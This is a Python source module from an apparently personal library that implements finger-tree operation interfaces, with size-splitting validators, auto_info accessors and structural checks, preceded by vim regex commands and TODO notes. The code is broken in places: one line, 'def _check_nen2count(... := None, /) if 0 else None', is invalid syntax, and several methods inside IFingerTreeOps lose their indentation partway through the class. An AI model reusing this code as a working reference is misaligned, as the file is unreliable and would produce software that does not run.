^\(\s*@abstractmethod.*\)\n\(\s*def \s*\)\([a-zA-Z]\w*\)[(]\(\w\+\)\(, \)\?\(.*\), [/][)]:\n\(\s*\)\(\S.*\)
.,$s//\1\r\2\3(\4\5\6, \/):\r\7\8\r\7return \4.__ops.\3(\6)
^\(\s*@abstractmethod.*\)\n\(\s*def \s*\)\(__\w*__\)[(]\(\w\+\)\(.*\), [/][)]:\n\(\s*\)\(\S.*\)
.,$s//\1\r\2\3(\4\5, \/):\r\6\7\r\6return type(\4.__ops).\3(\4.__ops\5)
@abstractmethod$
.,$s//@override
ReversedFingerTreeOps
TODO:
ops class re-export by diff module
insert/replace/join/times...
auto_info:
order_hash for seq
noncommutable-monoid!!!!
for reversable_finger_tree_ops: should hold both auto_info
unorder_hash for set
add kw reverse to push/...
reversable_finger_tree_ops
#or add invisitable reversed_supernode for node/digit/line_tree/deep_tree, then when unbox reversed deep_tree, neednot to change child attr
add attr reversed for node/digit/line_tree/deep_tree
活着
无数次灭杀仇敌,不断重复就是想不起早已手刃仇敌,永远活在心中
DONE:
xnodes -> xnode_seq
nodes -> node_seq
elements -> element_seq
DONE:
careless_check_ input
careless_check_ output
mk_node
unbox_node
get_auto_info_from_node
get_num_child_xnode_seq_of_node
calc_auto_info_from_xnode_seq
finger_tree_ops__setting__2c3__1T4
finger_tree_ops__setting__3c4__3T7
finger_tree_ops__setting__2c5__2T7
finger_tree_ops__setting__3c5__4T9
finger_tree_ops__setting__3c4c5__2T7
finger_tree_ops__setting__4c5c6c7__2T9
finger_tree_ops__setting__4c5c6c7__2T10
the_monoid_ops4size
the_monoid_ops4max__imay
the_monoid_ops4max__uint
the_monoid_ops4max__tmay
def check_finger_tree_ops__setting(finger_tree_ops__setting:IFingerTreeOps__setting, /):
py -m script.finger_tree_ops > /sdcard/0my_files/tmp/xxx/debug_out.txt
======================
======================
======================
======================
module: __main__: global def heads
class IFingerTreeOps__setting(ABC):
def check_finger_tree_ops__setting(finger_tree_ops__setting:IFingerTreeOps__setting, /):
class IFingerTreeOps(IFingerTreeOps__setting):
def tuple_reversed(seq, /):
def mk_ReversedFingerTreeOps(finger_tree_ops, /):
class WrappedFingerTreeOps__setting(IFingerTreeOps__setting):
class IFingerTreeOps__wrapped_setting(WrappedFingerTreeOps__setting, IFingerTreeOps):
class WrappedFingerTreeOps(IFingerTreeOps__wrapped_setting):
class ReversedFingerTreeOps(WrappedFingerTreeOps):
class abstractmethod_decls_of_IFingerTreeOps(IFingerTreeOps):
NamedTuple4FingerTreeOps__setting = namedtuple(
def mk_NamedTuple4FingerTreeOps__setting(nens, min_max_den_pair, overflow_nen, may_ordered_nens, /):
def mk_FingerTreeOps__setting(nens, min_max_den_pair, overflow_nen, may_ordered_nens, /):
def _mk_FingerTreeOps__setting(nens, min_max_den_pair, /):
class FingerTreeOps__setting(IFingerTreeOps__setting):
finger_tree_ops__setting__2c3__1T4 \
finger_tree_ops__setting__3c4__3T7 \
finger_tree_ops__setting__2c5__2T7 \
finger_tree_ops__setting__3c5__4T9 \
finger_tree_ops__setting__3c4c5__2T7 \
finger_tree_ops__setting__4c5c6c7__2T9 \
finger_tree_ops__setting__4c5c6c7__2T10 \
class IFingerTreeOps__raw_mk_element(IFingerTreeOps):
class IFingerTreeOps__cased_data(IFingerTreeOps__raw_mk_element):
def check_cased_tuple__with_depth(case_name, sz, depth, obj, /):
def _do_nothing(x, /):pass
class FingerTreeOps__funcs(IFingerTreeOps__cased_data, IFingerTreeOps__wrapped_setting):
a_sized_finger_tree_ops = FingerTreeOps__funcs(finger_tree_ops__setting__2c3__1T4, the_monoid_ops4size, calc_auto_info_from_user_obj=lambda user_obj, /:1, careless_check_user_obj=None)
class IFingerTreeOps__sized(IFingerTreeOps):
def offset_may_signed_rng_by_sz(sz, begin, end, /):
def offset_signed_idx_by_sz(sz, idx, /):
class IFingerTreeOps__max_priority(IFingerTreeOps):
======================
======================
======================
======================
#'''
if __name__ == '__main__':
    #put anywhere, neednot at eof
    # Self-inspection hook: prints this module's info blocks when run directly.
    from seed.debug._debug import main__print_infos_of_modules as _main
    _main([__name__])
# Explicit public API of this module (whitespace-split name list).
__all__ = '''
    IFingerTreeOps__setting
    check_finger_tree_ops__setting
    IFingerTreeOps
    tuple_reversed
    mk_ReversedFingerTreeOps
    WrappedFingerTreeOps__setting
    IFingerTreeOps__wrapped_setting
    WrappedFingerTreeOps
    ReversedFingerTreeOps
    abstractmethod_decls_of_IFingerTreeOps
    NamedTuple4FingerTreeOps__setting
    mk_NamedTuple4FingerTreeOps__setting
    mk_FingerTreeOps__setting
    FingerTreeOps__setting
    finger_tree_ops__setting__2c3__1T4
    finger_tree_ops__setting__3c4__3T7
    finger_tree_ops__setting__2c5__2T7
    finger_tree_ops__setting__3c5__4T9
    finger_tree_ops__setting__3c4c5__2T7
    finger_tree_ops__setting__4c5c6c7__2T9
    finger_tree_ops__setting__4c5c6c7__2T10
    IFingerTreeOps__raw_mk_element
    IFingerTreeOps__cased_data
    check_cased_tuple__with_depth
    FingerTreeOps__funcs
    a_sized_finger_tree_ops
    IFingerTreeOps__sized
    offset_may_signed_rng_by_sz
    offset_signed_idx_by_sz
    IFingerTreeOps__max_priority
'''.split()
#HHHHH
___begin_mark_of_excluded_global_names__0___ = ...
from seed.ops.IOps4OneMainObjType import _mk_reversed_ops, IMonoidOps, the_monoid_ops4size, IMonoidOps4max, mk_ReversedMeasurableOps, IMeasurableOps, mk_ReversedMonoidOps
# view ../../python3_src/seed/ops/IOps4OneMainObjType.py
from seed.helper.check.checkers import check_mapping, check_int, check_uint, check_strict_sorted, check_int_ge1, check_int_ge2, check_all, check_tuple, check_pair, check_instance, check_uint_imay, check_type_is, check_seq, check_len_of, check_union_of_cased_tuples, check_cased_tuple, check_callable, check_bool
#, check_str, check_tmay, check_is_None, check_result_of_cmp, check_result_of_partial_cmp
from seed.types.FrozenDict import FrozenDict, mk_FrozenDict
#from seed.math.floor_ceil import offsetted_divmod
from seed.math.cut_uint_into_uints import Helper4cut_uint_into_uints, calc_lowerbound_of_inf_compact_domain_rng4cut_uint_into_uints
from seed.ops.IOps4OneMainObjType import _mk_reversed_ops
from seed.for_libs.for_functools.reduce import reduce_with_tmay
from seed.abc.abc import override
from seed.abc.ISingleton import ISingleton
from seed.tiny import echo
from abc import ABC, abstractmethod
import itertools
from collections import namedtuple
import operator
___end_mark_pattern_of_excluded_global_names__9999___ = ...
___end_mark_of_excluded_global_names__0___ = ...
# NOTE(review): bare expression statements -- presumably here to assert that
# these checker imports resolve at import time (and to mark them as used for
# linters); confirm the intent before removing.
check_mapping
check_int
check_uint
check_strict_sorted
check_int_ge1
check_int_ge2
check_all
check_tuple
check_pair
check_instance
#HHHHH
#HHHHH
class IFingerTreeOps__setting(ABC):
    r'''Static configuration of a finger-tree flavour.

    abbreviations:
        nd=nen <- nens = node_element_numbers
        dg=den <- dens = digit_element_numbers
        m = min digit_element_numbers
        M = max digit_element_numbers
    ====outdated, see IFingerTreeOps.__doc__ instead
    Node e
        = Node {element_seq::tuple<e>{len<-nens}, auto_info}
    Digit e
        = Digit {element_seq::tuple<e>{len<-dens}, auto_info}
    FingerTree depth e
        = Line {xnode_seq::tuple<e>{len<-[0..2*m-1]}, auto_info}
        | Deep {ldigit::Digit e, mtree::FingerTree (depth+1) (Node e), rdigit::Digit e, auto_info}
    #'''
    #=== configuration queries (implemented by concrete settings) ===
    @abstractmethod
    def get_sorted_node_element_numbers(sf, /):
        '-> sorted tuple<uint> #the allowed Node arities, strictly increasing'
    @abstractmethod
    def get_node_element_number_frozenset(sf, /):
        '-> frozenset<uint> #same values as get_sorted_node_element_numbers()'
    @abstractmethod
    def get_min_max_digit_element_number_pair(sf, /):
        '-> (min digit_element_numbers::uint, max digit_element_numbers::uint)'
    #=== size-splitting hooks + their checked public wrappers ===
    #each public wrapper validates the input size, calls the abstract hook on
    #the concrete class, validates the hook's result, and freezes the mapping.
    @abstractmethod
    def ___split_size__case_digit_seq_digit___(sf, sz, /):
        '[2*min digit_element_numbers..] -> {nen:uint} #see:split_size__case_digit_seq_digit'
    def split_size__case_digit_seq_digit(sf, sz, /):
        '[2*min digit_element_numbers..] -> {nen:uint} #see:join__tqt/xnode_seq2node_seq__dqd/___split_size__case_digit_seq_digit___'
        min_den, max_den = sf.get_min_max_digit_element_number_pair()
        check_int(sz, min=2*min_den)
        nen2count = type(sf).___split_size__case_digit_seq_digit___(sf, sz)
        _ops_check_result_of_split_size__case_digit_seq_digit(sf, sz, nen2count)
        return mk_FrozenDict(nen2count)
    @abstractmethod
    def ___split_size__case_digit_seq___(sf, sz, /):
        '[min digit_element_numbers..] -> (den, {nen:uint}) #see:split_size__case_digit_seq'
    def split_size__case_digit_seq(sf, sz, /):
        '[min digit_element_numbers..] -> (den, {nen:uint}) #see: join__qt/mk_pseudo_deep_tree__with_xnode_seqL_of_arbitrary_size/xnode_seq2ldigit_node_seq__qd/___split_size__case_digit_seq___'
        min_den, max_den = sf.get_min_max_digit_element_number_pair()
        check_int(sz, min=1*min_den)
        den, nen2count = type(sf).___split_size__case_digit_seq___(sf, sz)
        _ops_check_result_of_split_size__case_digit_seq(sf, sz, den, nen2count)
        return (den, mk_FrozenDict(nen2count))
    @abstractmethod
    def ___split_size__case_seq___(sf, sz, /):
        '[2*min digit_element_numbers..] -> (a::den, b::den, {nen:uint}){a<=b} #see:split_size__case_seq'
    def split_size__case_seq(sf, sz, /):
        '[2*min digit_element_numbers..] -> (a::den, b::den, {nen:uint}){a<=b} #see:mk_tree_from_xnode_seq/xnode_seq2ldigit_node_seq_rdigit__q/___split_size__case_seq___'
        min_den, max_den = sf.get_min_max_digit_element_number_pair()
        check_int(sz, min=2*min_den)
        small_den, big_den, nen2count = type(sf).___split_size__case_seq___(sf, sz)
        _ops_check_result_of_split_size__case_seq(sf, sz, small_den, big_den, nen2count)
        return (small_den, big_den, mk_FrozenDict(nen2count))
    #=== overflow node size hook + wrappers ===
    @abstractmethod
    def ___get_num_child_xnode_seq_of_new_node_when_push_overflow___(sf, /):
        '-> num_child_xnode_seq=overflow_nen::nen #see:get_num_child_xnode_seq_of_new_node_when_push_overflow'
    def _get_num_child_xnode_seq_of_new_node_when_push_overflow(sf, /):
        '-> num_child_xnode_seq=overflow_nen::nen #to avoid recur by not use _ops_check_overflow_nen #see: get_num_child_xnode_seq_of_new_node_when_push_overflow'
        #partial check only: _ops_check_overflow_nen itself calls
        #split_size__case_digit_seq, which could recurse into the full check
        overflow_nen = type(sf).___get_num_child_xnode_seq_of_new_node_when_push_overflow___(sf)
        _ops_check_overflow_nen__part(sf, overflow_nen)
        return overflow_nen
    def get_num_child_xnode_seq_of_new_node_when_push_overflow(sf, /):
        '-> num_child_xnode_seq=overflow_nen::nen #see: ipushL__tree/___get_num_child_xnode_seq_of_new_node_when_push_overflow___'
        overflow_nen = type(sf).___get_num_child_xnode_seq_of_new_node_when_push_overflow___(sf)
        _ops_check_overflow_nen(sf, overflow_nen)
        return overflow_nen
    #=== small per-value validators ===
    def _check_nen(sf, nen, /):
        #a node arity must be one of the configured node element numbers
        check_int_ge2(nen)
        nen_set = sf.get_node_element_number_frozenset()
        if not nen in nen_set: raise ValueError
    def _check_den(sf, den, /):
        #a digit width must lie within [min_den, max_den]
        check_uint(den)
        min_den, max_den = sf.get_min_max_digit_element_number_pair()
        if not min_den <= den <= max_den: raise ValueError
    def _check_len_line_tree(sf, sz0, /):
        #a Line (shallow) tree holds fewer than 2*min_den elements
        check_uint(sz0)
        min_den, max_den = sf.get_min_max_digit_element_number_pair()
        if not sz0 < 2*min_den: raise ValueError
#end of class IFingerTreeOps__setting(ABC):
#HHHHH
def check_finger_tree_ops__setting(finger_tree_ops__setting:IFingerTreeOps__setting, /):
    r'''Validate a settings object against the finger-tree structural constraints.

    design notes: others/数学/编程/tree/finger_tree.txt
    final constraints (origin: the "safe" discussion in the design notes):
        +[2 <= min nd <= max nd <= max dg - min dg]
            constraint A ('约束甲')
            #(design note: this could perhaps be relaxed -- once (1+max dg)
            # is reached the overflow can be split into several Nodes, so
            # max dg need not be large; kept strict here.)
        +[min nd <= 2*min dg][the nd values can compose every total in [2*min dg..]]
            constraint B ('约束乙')
    variables:
        nd = the allowed Node sizes  #e.g. [2..3] in scheme 0 below
        dg = the allowed Digit sizes #e.g. [1..4] in scheme 0 below
    candidate schemes:
        0: nd<-[2,3], dg <-[1..>=4]
        1: nd<-[3,4], dg <-[3..>=7]
        2: nd<-[2,5], dg <-[2..>=7]
        3: nd<-[3,5], dg <-[4..>=9]
        4: nd<-[3,4,5], dg <-[2..>=7]
        5: nd<-[4,5,6,7], dg <-[2..>=9]
            nd<-[4,5,6,7], dg <-[2..10]
                2..5..7..10
    #'''
    check_instance(IFingerTreeOps__setting, finger_tree_ops__setting)
    #--- the node sizes must be a strictly sorted tuple of at least two ints >= 2 ---
    nens = node_element_numbers = finger_tree_ops__setting.get_sorted_node_element_numbers()
    if 1:
        check_tuple(nens)
        check_all(check_int_ge2, nens)
        check_strict_sorted(nens)
        check_int(len(nens), min=2)
    #smallest total from which every larger total is expressible as a sum of nens values
    lowbd = calc_lowerbound_of_inf_compact_domain_rng4cut_uint_into_uints(nens)
    #check inside gcd==1
    #--- the frozenset view must agree with the sorted tuple ---
    nen_set = node_element_number_set = finger_tree_ops__setting.get_node_element_number_frozenset()
    if 1:
        check_type_is(frozenset, nen_set)
        check_all(check_int_ge2, nen_set)
        check_len_of(nens, sz=len(nen_set))
        if not frozenset(nens) == nen_set: raise ValueError
    #--- digit bounds: a strictly increasing pair of positive ints ---
    mM_den_pair = min_max_digit_element_number_pair = finger_tree_ops__setting.get_min_max_digit_element_number_pair()
    if 1:
        check_pair(mM_den_pair)
        check_all(check_int_ge1, mM_den_pair)
        check_strict_sorted(mM_den_pair)
    min_den, max_den = mM_den_pair
    min_nen = min(nens)
    max_nen = max(nens)
    if not 2 <= min_nen <= max_nen <= max_den - min_den: raise ValueError('约束甲')
    if not min_nen <= lowbd <= 2*min_den: raise ValueError('约束乙')
    if 1:
        #--- exercise the three split hooks over a representative size range ---
        def _check_sz2__dqd(sz2, /):
            nen2count = finger_tree_ops__setting.split_size__case_digit_seq_digit(sz2)
            _check_result_of_split_size__case_digit_seq_digit(nen_set, sz2, nen2count)
        def _check_sz2__q(sz2, /):
            small_den, big_den, nen2count = finger_tree_ops__setting.split_size__case_seq(sz2)
            _check_result_of_split_size__case_seq(nen_set, min_den, max_den, sz2, small_den, big_den, nen2count)
        def _check_sz1__dq(sz1, /):
            den, nen2count = finger_tree_ops__setting.split_size__case_digit_seq(sz1)
            _check_result_of_split_size__case_digit_seq(nen_set, min_den, max_den, sz1, den, nen2count)
        #nen_set = set(nens)
        #for i in range(min_nen):
        for i in range(sum(nens)):
            sz2 = 2*min_den +i
            _check_sz2__dqd(sz2)
            _check_sz2__q(sz2)
            sz1 = 1*min_den +i
            _check_sz1__dq(sz1)
    ###
    #--- the declared overflow node size must pass the full overflow check ---
    overflow_nen = finger_tree_ops__setting.get_num_child_xnode_seq_of_new_node_when_push_overflow()
    _ops_check_overflow_nen(finger_tree_ops__setting, overflow_nen)
#end of def check_finger_tree_ops__setting(finger_tree_ops__setting:IFingerTreeOps__setting, /):
#HHHHH
#begin of def _ops_check_result_of_...
#NOTE(review): module-level validators for the split_size__case_* results and
#the push-overflow node size; used by check_finger_tree_ops__setting above.
#All check_* helpers are project-level (defined elsewhere in this file/package).
if 1:
    def _check_nen2count(sf_unused_nen_set_doc := None, /) if 0 else None
    del _check_nen2count
    def _check_nen2count(nen_set, sz, nen2count, /):
        #nen2count :: {node_element_number: count}; its weighted sum must equal sz
        check_mapping(nen2count)
        check_all(check_uint, nen2count.keys())
        check_all(check_uint, nen2count.values())
        #keys must be drawn from the set of legal node sizes
        if not len(nen2count) <= len(nen_set): raise ValueError
        if not set(nen2count) <= nen_set: raise ValueError
        #the multiset of node sizes must add up to exactly sz
        if not sz == sum(nen*count for nen, count in nen2count.items()): raise ValueError
    def _ops_check_result_of_split_size__case_digit_seq_digit(finger_tree_ops__setting, sz2, nen2count, /):
        #sz2 covers two digits' worth of children, hence the 2*min_den lower bound
        nen_set = finger_tree_ops__setting.get_node_element_number_frozenset()
        min_den, max_den = finger_tree_ops__setting.get_min_max_digit_element_number_pair()
        check_int(sz2, min=2*min_den)
        _check_result_of_split_size__case_digit_seq_digit(nen_set, sz2, nen2count)
    def _ops_check_result_of_split_size__case_seq(finger_tree_ops__setting, sz2, small_den, big_den, nen2count, /):
        nen_set = finger_tree_ops__setting.get_node_element_number_frozenset()
        min_den, max_den = finger_tree_ops__setting.get_min_max_digit_element_number_pair()
        check_int(sz2, min=2*min_den)
        _check_result_of_split_size__case_seq(nen_set, min_den, max_den, sz2, small_den, big_den, nen2count)
    def _ops_check_result_of_split_size__case_digit_seq(finger_tree_ops__setting, sz1, den, nen2count, /):
        #sz1 covers one digit's worth of children, hence the 1*min_den lower bound
        nen_set = finger_tree_ops__setting.get_node_element_number_frozenset()
        min_den, max_den = finger_tree_ops__setting.get_min_max_digit_element_number_pair()
        check_int(sz1, min=1*min_den)
        _check_result_of_split_size__case_digit_seq(nen_set, min_den, max_den, sz1, den, nen2count)
    def _check_result_of_split_size__case_digit_seq_digit(nen_set, sz2, nen2count, /):
        #everything becomes nodes: nen2count alone must account for sz2
        _check_nen2count(nen_set, sz2, nen2count)
    def _check_result_of_split_size__case_seq(nen_set, min_den, max_den, sz2, small_den, big_den, nen2count, /):
        #two digits (small_den, big_den) are carved off; the remainder becomes nodes
        check_uint(small_den)
        check_uint(big_den)
        if not min_den <= small_den <= big_den <= max_den: raise ValueError
        if not small_den + big_den <= sz2: raise ValueError
        _check_nen2count(nen_set, sz2 - (small_den + big_den), nen2count)
    def _check_result_of_split_size__case_digit_seq(nen_set, min_den, max_den, sz1, den, nen2count, /):
        #one digit (den) is carved off; the remainder becomes nodes
        check_uint(den)
        if not min_den <= den <= max_den: raise ValueError
        if not den <= sz1: raise ValueError
        _check_nen2count(nen_set, sz1 - den, nen2count)
    def _ops_check_overflow_nen__part(finger_tree_ops__setting, overflow_nen, /):
        #overflow_nen must itself be a legal node size (and at least 2)
        nen_set = finger_tree_ops__setting.get_node_element_number_frozenset()
        check_int_ge2(overflow_nen)
        if not overflow_nen in nen_set: raise ValueError
    def _ops_check_overflow_nen(finger_tree_ops__setting, overflow_nen, /):
        'see:get_num_child_xnode_seq_of_new_node_when_push_overflow'
        ####overflow_nen = finger_tree_ops__setting.get_num_child_xnode_seq_of_new_node_when_push_overflow()
        _ops_check_overflow_nen__part(finger_tree_ops__setting, overflow_nen)
        min_den, max_den = finger_tree_ops__setting.get_min_max_digit_element_number_pair()
        sz1 = max_den+1 #overflow@ipushL__tree
        check_int(sz1, min=1*min_den)
        den, nen2count = finger_tree_ops__setting.split_size__case_digit_seq(sz1)
        #recur?
        check_uint(den)
        check_mapping(nen2count)
        #splitting an overflowing digit must yield exactly one node of size overflow_nen
        #if not nen2count == FrozenDict({overflow_nen:1}):raise ValueError
        if not len(nen2count) == 1:raise ValueError
        if not dict(nen2count) == {overflow_nen:1}:raise ValueError
        finger_tree_ops__setting._check_den(den)
        #NOTE(review): `logic-err` is an undefined name; raising it surfaces a
        #NameError -- this appears to be the project's assert-unreachable idiom
        #(TODO confirm with module author).
        if not min_den+1 <= den == sz1-overflow_nen <= max_den-1:raise logic-err
#HHHHH
class IFingerTreeOps(IFingerTreeOps__setting):
r'''
tree<depth>
= line_tree<depth>
| deep_tree<depth>
line_tree<depth>
= Line (depth::uint, xnode_seq::[xnode<depth-1>], auto_info)
where len(xnode_seq) <- [0..2*min_den-1]
deep_tree<depth>
= Deep (depth::uint, ldigit::digit<depth>, mtree::tree<depth+1>, rdigit::digit<depth>, auto_info)
digit<depth>
= Digit (depth::uint, xnode_seq::[xnode<depth-1>], auto_info)
where len(xnode_seq) <- [min_den..max_den]
xnode<imay_depth>
| imay_depth == -1 = element
| imay_depth >= 0 = let depth = imay_depth in node<depth>
node<depth>
= Node (depth::uint, xnode_seq::[xnode<depth-1>], auto_info)
where len(xnode_seq) <- nens
element
= Element (user_obj, auto_info)
#'''
    #-- auto_info accessors ---------------------------------------------------
    #NOTE(review): each public getter dispatches to its abstract hook via
    #`type(sf).___hook___(sf, ...)` (class-level lookup, so an instance
    #attribute can never shadow the hook) and validates inputs/outputs around
    #the call.  The ___hook___ does the raw work; the public method is the
    #checked facade.
    @abstractmethod
    def ___get_monoid_ops4auto_info___(sf, /):
        '-> monoid_ops<auto_info>::IMonoidOps #see:get_monoid_ops4auto_info'
    def get_monoid_ops4auto_info(sf, /):
        '-> monoid_ops<auto_info>::IMonoidOps #see:___get_monoid_ops4auto_info___'
        monoid_ops4auto_info = type(sf).___get_monoid_ops4auto_info___(sf)
        check_instance(IMonoidOps, monoid_ops4auto_info)
        return monoid_ops4auto_info
    @abstractmethod
    def ___get_auto_info_from_element___(sf, element, /):
        'element -> auto_info #see:get_auto_info_from_element'
    def get_auto_info_from_element(sf, element, /):
        'element -> auto_info #see:___get_auto_info_from_element___'
        sf.careless_check_element(element)
        auto_info = type(sf).___get_auto_info_from_element___(sf, element)
        sf.careless_check_auto_info(auto_info)
        return auto_info
    @abstractmethod
    def ___get_auto_info_from_node___(sf, depth, node, /):
        'depth -> node<depth> -> auto_info #see:get_auto_info_from_node'
    def get_auto_info_from_node(sf, depth, node, /):
        'depth -> node<depth> -> auto_info #see:___get_auto_info_from_node___'
        sf.careless_check_depth_of_node(depth, node)
        auto_info = type(sf).___get_auto_info_from_node___(sf, depth, node)
        sf.careless_check_auto_info(auto_info)
        return auto_info
    @abstractmethod
    def ___get_auto_info_from_digit___(sf, depth, digit, /):
        'depth -> digit<depth> -> auto_info #see:get_auto_info_from_digit'
    def get_auto_info_from_digit(sf, depth, digit, /):
        'depth -> digit<depth> -> auto_info #see:___get_auto_info_from_digit___'
        sf.careless_check_depth_of_digit(depth, digit)
        auto_info = type(sf).___get_auto_info_from_digit___(sf, depth, digit)
        sf.careless_check_auto_info(auto_info)
        return auto_info
    @abstractmethod
    def ___get_auto_info_from_line_tree___(sf, depth, line_tree, /):
        'depth -> line_tree<depth> -> auto_info #see:get_auto_info_from_line_tree'
    def get_auto_info_from_line_tree(sf, depth, line_tree, /):
        'depth -> line_tree<depth> -> auto_info #see:___get_auto_info_from_line_tree___'
        sf.careless_check_depth_of_line_tree(depth, line_tree)
        auto_info = type(sf).___get_auto_info_from_line_tree___(sf, depth, line_tree)
        sf.careless_check_auto_info(auto_info)
        return auto_info
    @abstractmethod
    def ___get_auto_info_from_deep_tree___(sf, depth, deep_tree, /):
        'depth -> deep_tree<depth> -> auto_info #see:get_auto_info_from_deep_tree'
    def get_auto_info_from_deep_tree(sf, depth, deep_tree, /):
        'depth -> deep_tree<depth> -> auto_info #see:___get_auto_info_from_deep_tree___'
        sf.careless_check_depth_of_deep_tree(depth, deep_tree)
        auto_info = type(sf).___get_auto_info_from_deep_tree___(sf, depth, deep_tree)
        sf.careless_check_auto_info(auto_info)
        return auto_info
    #-- child-count accessors -------------------------------------------------
    #Size vocabulary used below: `nen` = node element number (node child count),
    #`den` = digit element number (digit child count), `sz0` = line-tree length;
    #each is validated with its own _check_* from the settings layer.
    @abstractmethod
    def ___get_num_child_xnode_seq_of_node___(sf, depth, node, /):
        'depth -> node<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_node'
    def get_num_child_xnode_seq_of_node(sf, depth, node, /):
        'depth -> node<depth> -> num_child_xnode_seq #see:___get_num_child_xnode_seq_of_node___'
        sf.careless_check_depth_of_node(depth, node)
        num_child_xnode_seq = type(sf).___get_num_child_xnode_seq_of_node___(sf, depth, node)
        nen = num_child_xnode_seq
        sf._check_nen(nen)
        return num_child_xnode_seq
    @abstractmethod
    def ___get_num_child_xnode_seq_of_digit___(sf, depth, digit, /):
        'depth -> digit<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_digit'
    def get_num_child_xnode_seq_of_digit(sf, depth, digit, /):
        'depth -> digit<depth> -> num_child_xnode_seq #see:___get_num_child_xnode_seq_of_digit___'
        sf.careless_check_depth_of_digit(depth, digit)
        num_child_xnode_seq = type(sf).___get_num_child_xnode_seq_of_digit___(sf, depth, digit)
        den = num_child_xnode_seq
        sf._check_den(den)
        return num_child_xnode_seq
    @abstractmethod
    def ___get_num_child_xnode_seq_of_line_tree___(sf, depth, line_tree, /):
        'depth -> line_tree<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_line_tree'
    def get_num_child_xnode_seq_of_line_tree(sf, depth, line_tree, /):
        'depth -> line_tree<depth> -> num_child_xnode_seq #see:___get_num_child_xnode_seq_of_line_tree___'
        sf.careless_check_depth_of_line_tree(depth, line_tree)
        num_child_xnode_seq = type(sf).___get_num_child_xnode_seq_of_line_tree___(sf, depth, line_tree)
        sz0 = num_child_xnode_seq
        sf._check_len_line_tree(sz0)
        return num_child_xnode_seq
# careless_check_... used only in mk_.../unbox_.../get_auto_info_from_.../get_num_child_xnode_seq_of_.../calc_auto_info_from_.../careless_check_...
    @abstractmethod
    def ___careless_check_auto_info___(sf, auto_info, /):
        'obj{?auto_info} -> (None|raise) #see:careless_check_auto_info'
    def careless_check_auto_info(sf, auto_info, /):
        'obj{?auto_info} -> (None|raise) #see:___careless_check_auto_info___'
        #first the monoid-level shape check, then the subclass hook
        sf.get_monoid_ops4auto_info().careless_check_main_obj(auto_info)
        type(sf).___careless_check_auto_info___(sf, auto_info)
    @abstractmethod
    def careless_check_user_obj(sf, user_obj, /):
        'obj{?user_obj} -> (None|raise)'
    @abstractmethod
    def careless_check_element(sf, element, /):
        'obj{?element} -> (None|raise)'
    #-- shallow ("careless") structural checks --------------------------------
    #Each pair validates only the depth argument here; the abstract hook does
    #whatever (cheap) structural checking the subclass chooses.
    @abstractmethod
    def ___careless_check_depth_of_node___(sf, depth, node, /):
        'depth -> obj{?node<depth>} -> (None|raise) #see:careless_check_depth_of_node'
    def careless_check_depth_of_node(sf, depth, node, /):
        'depth -> obj{?node<depth>} -> (None|raise) #see:___careless_check_depth_of_node___'
        check_uint(depth)
        type(sf).___careless_check_depth_of_node___(sf, depth, node)
    @abstractmethod
    def ___careless_check_depth_of_digit___(sf, depth, digit, /):
        'depth -> obj{?digit<depth>} -> (None|raise) #see:careless_check_depth_of_digit'
    def careless_check_depth_of_digit(sf, depth, digit, /):
        'depth -> obj{?digit<depth>} -> (None|raise) #see:___careless_check_depth_of_digit___'
        check_uint(depth)
        type(sf).___careless_check_depth_of_digit___(sf, depth, digit)
    @abstractmethod
    def ___careless_check_depth_of_line_tree___(sf, depth, line_tree, /):
        'depth -> obj{?line_tree<depth>} -> (None|raise) #see:careless_check_depth_of_line_tree'
    def careless_check_depth_of_line_tree(sf, depth, line_tree, /):
        'depth -> obj{?line_tree<depth>} -> (None|raise) #see:___careless_check_depth_of_line_tree___'
        check_uint(depth)
        type(sf).___careless_check_depth_of_line_tree___(sf, depth, line_tree)
    @abstractmethod
    def ___careless_check_depth_of_deep_tree___(sf, depth, deep_tree, /):
        'depth -> obj{?deep_tree<depth>} -> (None|raise) #see:careless_check_depth_of_deep_tree'
    def careless_check_depth_of_deep_tree(sf, depth, deep_tree, /):
        'depth -> obj{?deep_tree<depth>} -> (None|raise) #see:___careless_check_depth_of_deep_tree___'
        check_uint(depth)
        type(sf).___careless_check_depth_of_deep_tree___(sf, depth, deep_tree)
def careless_check_depth_of_tree(sf, depth, tree, /):
'depth -> obj{?tree<depth>} -> (None|raise)'
check_uint(depth)
#but is_tree_line?? assume tree!!!
if sf._is_tree_line(depth, tree):
sf.careless_check_depth_of_line_tree(depth, tree)
else:
sf.careless_check_depth_of_deep_tree(depth, tree)
def careless_check_depth_of_xnode(sf, depth, xnode, /):
'depth -> obj{?xnode<depth-1>} -> (None|raise)'
check_uint(depth)
if not depth:
sf.careless_check_element(xnode)
else:
node = xnode
sf.careless_check_depth_of_node(depth, node)
def careless_check_depth_of_xnode_seq(sf, depth, xnode_seq, /):
'depth -> obj{?[xnode<depth-1>]} -> (None|raise)'
check_uint(depth)
check_seq(xnode_seq)
for xnode in xnode_seq:
sf.careless_check_depth_of_xnode(depth, xnode)
def calc_auto_info_from_auto_infos(sf, auto_infos, /):
'Iter auto_info -> auto_info'
monoid_ops4auto_info = sf.get_monoid_ops4auto_info()
auto_info = monoid_ops4auto_info.assoc_op0s(auto_infos)
sf.careless_check_auto_info(auto_info)
return auto_info
def calc_auto_info_from_xnode_seq(sf, depth, xnode_seq, /):
'depth -> [xnode<depth-1>] -> auto_info'
sf.careless_check_depth_of_xnode_seq(depth, xnode_seq)
auto_infos = (sf.get_auto_info_from_xnode(depth, xnode) for xnode in xnode_seq)
auto_info = sf.calc_auto_info_from_auto_infos(auto_infos)
sf.careless_check_auto_info(auto_info)
return auto_info
    @abstractmethod
    def ___mk_element__calc_auto_info___(sf, user_obj, /):
        'raw user_obj -> boxed element #see:mk_element'
    def mk_element(sf, user_obj, /):
        'raw user_obj -> boxed element #see:___mk_element__calc_auto_info___'
        sf.careless_check_user_obj(user_obj)
        element = type(sf).___mk_element__calc_auto_info___(sf, user_obj)
        sf.careless_check_element(element)
        #the auto_info is fetched here purely to validate it; only the boxed
        #element is returned
        auto_info = sf.get_auto_info_from_element(element)
        sf.careless_check_auto_info(auto_info)
        return element
    @abstractmethod
    def ___mk_node__not_auto___(sf, depth, xnode_seq, auto_info, /):
        'depth -> [xnode<depth-1>] -> auto_info -> node<depth> #see:mk_node'
    def mk_node(sf, depth, xnode_seq, /):
        'depth -> [xnode<depth-1>] -> node<depth> #see:___mk_node__not_auto___'
